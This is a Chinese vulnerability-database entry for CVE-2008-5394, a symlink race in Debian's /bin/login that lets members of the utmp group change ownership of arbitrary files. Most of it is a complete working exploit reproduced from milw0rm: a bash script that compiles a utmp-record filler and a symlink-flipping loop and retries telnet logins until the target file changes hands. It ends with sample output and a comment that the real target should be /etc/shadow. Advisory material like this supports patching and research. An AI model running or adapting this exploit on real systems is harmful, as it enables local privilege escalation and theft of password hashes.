Debian Linux /bin/login软件包本地权限提升漏洞

漏洞ID 1116905 漏洞类型 后置链接
发布时间 2008-12-01 更新时间 2009-03-10
CVE编号 CVE-2008-5394 CNNVD-ID CNNVD-200812-119
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/7313
https://www.securityfocus.com/bid/32552
https://cxsecurity.com/issue/WLB-2008120003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-119
|漏洞详情
Debian是一个流行的Linux发行版本。Debian（以及可能的其他Linux发行版）中的login程序在处理utmp记录时，会跟随记录中ut_line字段所指向的路径（例如/tmp下的临时文件），而该路径可以是一个符号链接。utmp组中的本地用户拥有写入utmp记录的权限，可以把ut_line指向一个由自己控制的临时文件，并把该文件做成指向系统中任意文件的符号链接，从而利用竞争条件让以提升权限运行的login覆盖系统上的任意文件或改变其所有权和权限（下文EXP以/etc/debian_version为例演示所有权被改变）。
|漏洞EXP
#!/bin/bash -

echo '
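	#include <string.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <utmp.h>
	#include <sys/types.h>
	#include <stdio.h>

	/*
	 * Append eight LOGIN_PROCESS records to utmp whose ut_line all name
	 * /tmp/x, the path the rest of the script turns into a symlink.
	 * The records carry distinct ut_id values so that pututline() adds a
	 * new record each time instead of updating the same one.
	 * Needs write access to the utmp file (the setgid-utmp step in the
	 * script).  Returns 0 on success, 1 if any record could not be written.
	 */
	int main(int argc, char *argv[])
	{
	  /* Zero-initialise so no indeterminate stack bytes reach the utmp file. */
	  struct utmp entry = {0};
	  char id[16];
	  int i;
	  int rc = 0;

	  (void)argc;
	  (void)argv;

	  entry.ut_type = LOGIN_PROCESS;
	  snprintf(entry.ut_line, sizeof entry.ut_line, "%s", "/tmp/x");
	  snprintf(entry.ut_user, sizeof entry.ut_user, "%s", "badguy");
	  snprintf(entry.ut_host, sizeof entry.ut_host, "%s", "badhost");
	  /* ut_tv and ut_addr_v6 are already zero from the initialiser. */

	  setutent();
	  for (i = 1; i < 9; i++) {
	    entry.ut_pid = (pid_t)(i + (int)getpid());
	    /*
	     * ut_id is exactly 4 bytes and need not be NUL-terminated.  Format
	     * into a scratch buffer and copy only 4 bytes: sprintf("bad%d")
	     * straight into ut_id wrote a fifth (NUL) byte into ut_user.
	     */
	    snprintf(id, sizeof id, "bad%d", i);
	    memcpy(entry.ut_id, id, sizeof entry.ut_id);
	    if (pututline(&entry) == NULL) {
	      perror("pututline");
	      rc = 1;
	    }
	  }
	  endutent();
	  return rc;
	}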
' > /tmp/fillutmp.c

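# Build the utmp filler.  Abort if the compile fails: otherwise the retry
# loop below would try to run a binary that does not exist.
cc -o /tmp/fillutmp /tmp/fillutmp.c || { echo 'cc failed for /tmp/fillutmp.c' >&2; exit 1; }

# pututline() has to write the utmp file, which this script assumes the
# current user cannot do directly.  Setgid (2755) with group utmp makes the
# filler run with that group, the privilege the advisory names as required.
echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS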

echo '
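	#include <stdio.h>
	#include <unistd.h>

	/*
	 * Re-point the symlink /tmp/x at argv[1] and argv[2] in turn, forever,
	 * so that whichever process follows /tmp/x may see either target.
	 * The script runs this in the background and kills it when done.
	 * Exit status 2 if fewer than two targets are given; otherwise never returns.
	 */
	int main(int argc, char *argv[])
	{
	  if (argc < 3) {
	    fprintf(stderr, "usage: %s <target-a> <target-b>\n",
	            argc > 0 ? argv[0] : "jigglelnk");
	    return 2;
	  }
	  for (;;) {
	    /* Errors are ignored on purpose: the loop only has to keep flipping. */
	    unlink("/tmp/x");
	    symlink(argv[1], "/tmp/x");
	    unlink("/tmp/x");
	    symlink(argv[2], "/tmp/x");
	  }
	}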
' > /tmp/jigglelnk.c

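# Build the symlink flipper; abort on compile failure rather than
# backgrounding a missing binary later.
cc -o /tmp/jigglelnk /tmp/jigglelnk.c || { echo 'cc failed for /tmp/jigglelnk.c' >&2; exit 1; }

HOST=`hostname` # or simply localhost?
# The link is flipped between the real tty and the target file, presumably
# so that it mostly resolves to the tty and the telnet session still
# proceeds; the user has to guess which device the next login will get.
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
if [ -z "$TTY" ]; then
  echo 'No tty given, aborting.' >&2
  exit 1
fi
echo "You said it will be '$TTY' ..."

# File the link is flipped to; a harmless target for the demonstration.
ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk "$TTY" "$ATK" &
JIG=$!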

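# Make sure the background jiggler and the temp files go away even if the
# user interrupts the retry loop with Ctrl-C; the original left the flipper
# running forever in that case.
cleanup() {
  kill "$JIG" 2>/dev/null
  rm -f /tmp/fillutmp /tmp/jigglelnk /tmp/x
}
trap 'cleanup; exit 130' INT TERM

LOOP=0
while :; do
  ((LOOP++))
  echo; echo; echo "Try = $LOOP"

  # Re-seed utmp with the /tmp/x records before every attempt.
  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet "$HOST"

  # Assumes the target starts out owned by root:root.  Once either owner or
  # group is no longer root, something ran through the symlink and changed
  # the file (see the sample output below: owner psz, group tty, mode 0600).
  LS=`ls -ld "$ATK"`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

cleanup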

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version

# milw0rm.com [2008-12-01]
|受影响的产品
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu L
|参考资料

来源:XF
名称:debian-login-symlink(47037)
链接:http://xforce.iss.net/xforce/xfdb/47037
来源:UBUNTU
名称:USN-695-1
链接:http://www.ubuntu.com/usn/usn-695-1
来源:BID
名称:32552
链接:http://www.securityfocus.com/bid/32552
来源:BUGTRAQ
名称:20081130 /bin/login gives root to group utmp
链接:http://www.securityfocus.com/archive/1/archive/1/498769/100/0/threaded
来源:MILW0RM
名称:7313
链接:http://www.milw0rm.com/exploits/7313
来源:MANDRIVA
名称:MDVSA-2009:062
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:062
来源:SREASON
名称:4695
链接:http://securityreason.com/securityalert/4695
来源:GENTOO
名称:GLSA-200903-24
链接:http://security.gentoo.org/glsa/glsa-200903-24.xml
来源:OSVDB
名称:52200
链接:http://osvdb.org/52200
来源:bugs.debian.org
链接:http://bugs.debian.org/505271
来源:bugs.debian.org
链接:http://bugs.debian.org/505071
来源:bugs.debian.org
链接:http://bugs.debian.org/332198